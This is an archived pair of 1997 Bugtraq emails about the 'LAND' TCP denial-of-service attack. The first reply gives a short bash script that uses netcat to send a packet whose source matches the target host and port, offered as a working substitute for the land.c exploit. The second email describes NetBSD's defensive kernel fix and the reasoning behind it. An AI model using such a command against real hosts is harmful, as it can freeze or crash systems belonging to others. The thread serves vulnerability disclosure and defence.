          DAA01004 for <BUGTRAQ@NETSPACE.ORG.>; Sat, 22 Nov 1997 03:17:13 -0500
Received: from [email protected] (port 64837 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80781-11310>; Sat, 22 Nov 1997
          03:17:04 -0500
Approved-By: [email protected]
Received: from slartibartfast.sp.org (user-37kbodj.dialup.mindspring.com
          [207.69.225.179]) by netspace.org (8.8.7/8.8.2) with SMTP id DAA31118
          for <BUGTRAQ@NETSPACE.ORG.>; Sat, 22 Nov 1997 03:00:40 -0500
Received: (qmail 3361 invoked from network); 22 Nov 1997 08:00:55 -0000
Received: from slartibartfast.sp.org ([email protected]) by
          slartibartfast.sp.org with SMTP; 22 Nov 1997 08:00:55 -0000
X-Sender: [email protected]
X-Pgp-Fingerprint: 49 86 8A 89 66 2A F7 F7  77 7E 81 3E D6 4E AA CE
X-Pgp-Keyid: 4920E659
X-Pgp-Date: 1997-06-08
X-No-Archive: Yes
Approved: of course not
X-Get-A-Newsreader: <body text="#000000" bgcolor="#121212"><blink>
Distribution: bofh
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.3.96.971122075830.2861B-100000@slartibartfast.sp.org.>
Date: 	Sat, 22 Nov 1997 08:00:52 +0000
Reply-To: [email protected]
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: Peter <deviant@unixnet.org.>
Organization: bogosort
Subject:      Re: 44BSD port of land.c
X-To:         blast <blast@BRODER.COM.>
To: [email protected]
In-Reply-To:  <Pine.BSI.3.96.971121105621.1489C-100000@pillbox.broder.com.>
Status:   
X-PMFLAGS: 34078848 0

On Fri, 21 Nov 1997, blast wrote:

> For those of you who don't have all the "fancy" LINUX
> networking includes, here is a port to 44BSD flavors.
> Should compile fine on FreeBSD, NetBSD, OpenBSD, BSDi, etc.
> Enjoy.
> -blast

This seems to work, as long as you've got NetCat:

-----
#!/bin/bash
nc -s $1 -p $2 $1 $2
-----

where $1 is the host, and $2 is the port (139,23, 25, whatever)

I've tested this against several of the reported box types, and it seems
to perform as Aleph's list says, so I'm assuming it works.

 -- Peter
   PGP KeyID = 4920E659 Fingerprint = 49868A89662AF7F7 777E813ED64EAACE

The only constant is change.
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 31890 invoked from network); 23 Nov 1997 01:01:33 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 23 Nov 1997 01:01:33 -0000
Received: by scylla.sovam.com id AA29759
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sun, 23 Nov 1997 03:14:00 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA29647
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Sun, 23 Nov 1997 03:11:36 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id FAA27530
        for <mc@CONJURER.TYUMEN.RU.>; Sun, 23 Nov 1997 05:09:10 +0500 (ES)
Received: from [email protected] (port 19009 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97583-15161>; Sat, 22 Nov 1997 17:56:45 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5806669 for [email protected]; Sat, 22 Nov 1997 17:55:42
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          RAA30108 for <BUGTRAQ@NETSPACE.ORG.>; Sat, 22 Nov 1997 17:43:14 -0500
Received: from [email protected] (port 19009 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80912-15162>; Sat, 22 Nov 1997
          17:43:05 -0500
Approved-By: [email protected]
Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id OAA18183 for
          <BUGTRAQ@NETSPACE.ORG.>; Sat, 22 Nov 1997 14:15:14 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          OAA08385; Sat, 22 Nov 1997 14:19:11 -0500 (EST)
References: <Pine.SUN.3.94.971120151852.17245C-100000@dfw.dfw.net.>
Lines: 45
X-Mailer: Gnus v5.3/Emacs 19.34
Message-Id: <el24t54n3dc.fsf@bikini.ai.mit.edu.>
Date: 	Sat, 22 Nov 1997 14:19:11 -0500
Reply-To: "Charles M. Hannum" <mycroft@MIT.EDU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@MIT.EDU.>
Subject:      Re: "LAND" Attack Update
X-To:         Aleph One <aleph1@DFW.NET.>
To: [email protected]
In-Reply-To:  Aleph One's message of Thu, 20 Nov 1997 15:23:29 -0600
Status:   
X-PMFLAGS: 33554560 0

[Preface: I'd like to point out that a couple of groups are,
inadvertantly or otherwise, pulling a sneaky little bait-and-switch
trick.  Since they've now patched around the `land' bug, they now
claim they are not vulnerable, misleading people into thinking that
their systems are safe, when they may very well not be running code
that predates the patch, and therefore actually be quite vulnerable.
I find this trend very disturbing.]


The changes we've made in NetBSD to deal with the `land' attack are:

1) If a socket in LISTEN state receives a SYN+ACK packet, then send a
   RST and drop the packet.

2) If a socket in LISTEN state receives a SYN-only packet claiming to
   be from itself, then drop the packet.

The rationale for this is as follows:

1) Since the initial sequence number cannot possibly be known, it is
   never correct to send an ACK before an initial SYN has been sent.
   A socket in LISTEN state didn't send a SYN, unless it was a
   SYN+ACK, in response to a SYN-only packet, in the second stage of
   the 3WHS.  In this case, we would not expect to get another SYN; we
   should instead get an ACK-only packet to complete the 3WHS.  We
   treat the stray SYN+ACK the same as data for an old connection.

2) A socket in LISTEN state is not initiating a connection attempt, so
   if it receives a SYN-only packet from itself, it *must* be a
   forgery.  A self-connect would cause the socket to no longer be in
   LISTEN state before the SYN-only packet arrives.  There's no point
   in sending a RST in this case, since we'd just be sending it to
   ourselves.

   (Actually, this change isn't really complete; in theory, if the
   LISTEN socket was bound to INADDR_ANY, then we should check whether
   the source address of the SYN was any of our local addreses, not
   just that it matches the destination.  However, a failure to detect
   the attack at this point will merely generate an extra SYN+ACK that
   will be dropped by the first change.)

Interestingly, SunOS (not Solaris) appears to do #1, but still freezes
up.  I haven't investigated why.

<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>
Партнёры:
Хостинг:
Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру